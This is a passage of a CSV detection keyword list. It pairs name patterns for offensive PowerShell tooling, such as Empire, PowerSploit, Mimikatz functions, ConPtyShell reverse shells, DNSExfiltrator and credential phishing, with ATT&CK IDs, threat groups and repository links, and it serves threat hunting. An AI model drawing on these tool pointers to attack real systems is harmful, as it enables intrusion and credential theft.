framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-ConPtyShell*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*Invoke-ConPtyShell.ps1*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*Invoke-CreateRemoteThread*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialFilesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-CredentialFilesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-CredentialGuardCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-CredentialInjection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-CredentialInjection*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-CredentialInjection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialInjection.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialInjection.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialsPhish*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-DAFT.*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invoke-daisychain*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-DCOM.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-dcompayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-DCSync*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-DefenderExclusionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-DinvokeKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-DllHijackingCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-DllHijackingCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-DllInjection*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-DllInjection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-DNSExfiltrator*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*Invoke-DNSUpdate.ps1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,0,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Invoke-DomainHarvest*,offensive_tool_keyword,MailSniper,Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal,T1595 T1114 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-DomainHarvestOWA*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-DomainPasswordSpray*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-DOSfuscation*,offensive_tool_keyword,Invoke-DOSfuscation,Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html),T1027 - T1140 - T1059,TA0002 - TA0003 - TA0040,N/A,N/A,Defense Evasion,https://github.com/danielbohannon/Invoke-DOSfuscation,1,1,N/A,N/A,8,744,129,2018-03-27T12:16:18Z,2018-03-19T16:47:54Z -*Invoke-DriverCoInstallersCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-DumpOWAMailboxViaMSGraphApi*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*invoke-edrchecker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-EDRChecker.ps1*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Invoke-EgressCheck*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-EgressCheck.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EgressCheck.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Empire *,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*Invoke-Empire*,offensive_tool_keyword,empire,empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EndpointProtectionCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-EnumerateAzureBlobs.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-EnumerateAzureSubDomains.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-EnumerateLocalAdmin -Verbose*,greyware_tool_keyword,powershell,Find local admins on the domain machines,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*invokeenumeratelocaladmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 